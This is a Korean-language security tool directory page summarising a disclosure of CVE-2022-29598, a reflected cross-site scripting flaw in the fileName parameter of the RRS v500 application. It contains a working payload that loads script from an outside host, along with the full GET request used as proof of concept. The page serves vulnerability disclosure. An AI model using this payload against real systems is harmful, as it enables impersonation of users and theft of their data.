Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-29598 — RRS v500 애플리케이션은 반사형 크로스 사이트 스크립팅(XSS) 취약점에 취약합니다. | Kitploit
도구/GitHubGitHub/thegetch/cve-2022-29598
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubthegetch/cve-2022-29598

CVE-2022-29598

RRS v500 애플리케이션은 반사형 크로스 사이트 스크립팅(XSS) 취약점에 취약합니다.

저장소 보기
4년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-29598 : RSS v500의 반사형 크로스 사이트 스크립팅 (XSS) 취약점

Mitre URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29598

NIST URL: https://nvd.nist.gov/vuln/detail/CVE-2022-29598

Solutions Atlantic의 RRS v500 애플리케이션은 반사형 크로스 사이트 스크립팅 (XSS) 취약점에 취약합니다. XSS 취약점을 악용하면 공격자가 피해자 사용자로 가장하거나, 민감한 데이터를 노출하거나, 피해자 사용자가 수행할 수 있는 작업을 수행할 수 있습니다.

fileName 매개변수는 사용자 입력을 수락하여 서버 응답에 그대로 반영하는 것으로 확인되었습니다. 반영 전에 일부 특수 문자 인코딩(보다 큼/작음 기호)과 같은 사용자 입력 필터링 및 살균이 수행되었지만, 반영이 JavaScript 컨텍스트 내에서 발생했기 때문에 제한을 우회하여 JavaScript 코드를 서버 응답에 주입할 수 있었습니다.

영향을 받는 URL:

  • /RRSWeb/maint/ShowDocument/ShowDocument.aspx

사용된 XSS 페이로드:

  • javascript:var%20x=document.createElement("script");x.src="https://thegetch.github.io/x";document.body.appendChild(x)';//

개념 증명 (POC):

문서 표시 기능:

영향을 받는 URL:

  • /RRSWeb/maint/ShowDocument/ShowDocument.aspx

애플리케이션은 외부 웹사이트에 연결하는 기능을 가지고 있습니다. 외부 사이트 링크를 선택하면 두 개의 매개변수, 즉 리디렉션될 외부 사이트의 URL을 포함하는 fileName과 ExternalLink 값을 갖는 requestType과 함께 /RRSWeb/maint/ShowDocument/ShowDocument.aspx에 요청이 전송됩니다. requestType 매개변수가 기본값으로 설정되어 있는 한, 사용자가 fileName 매개변수에 입력한 모든 내용은 JavaScript 컨텍스트, 특히 window.location.href 내에 반영됩니다. JavaScript 지시문이 포함된 XSS 페이로드를 사용하면 성공적인 반사형 XSS 공격이 발생할 수 있습니다.

XSS 페이로드가 포함된 GET 요청:

root@kitploit:~
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?requestType=ExternalLink&fileName=javascript:var%20x=document.createElement("script");x.src="https://thegetch.github.io/x";document.body.appendChild(x)';// HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://<REDACTED>/RRSweb/default.aspx
Cookie: ASP.NET_SessionId=<REDACTED>
Upgrade-Insecure-Requests: 1
Content-Length: 0


서버 응답:

01_RRS_XSS_Response_JS_Directive

브라우저에서 렌더링됨:

02_RRS_XSS_Rendered

발견

2022년 4월

  • Eric Getchell - TheGetch
도구 다운로드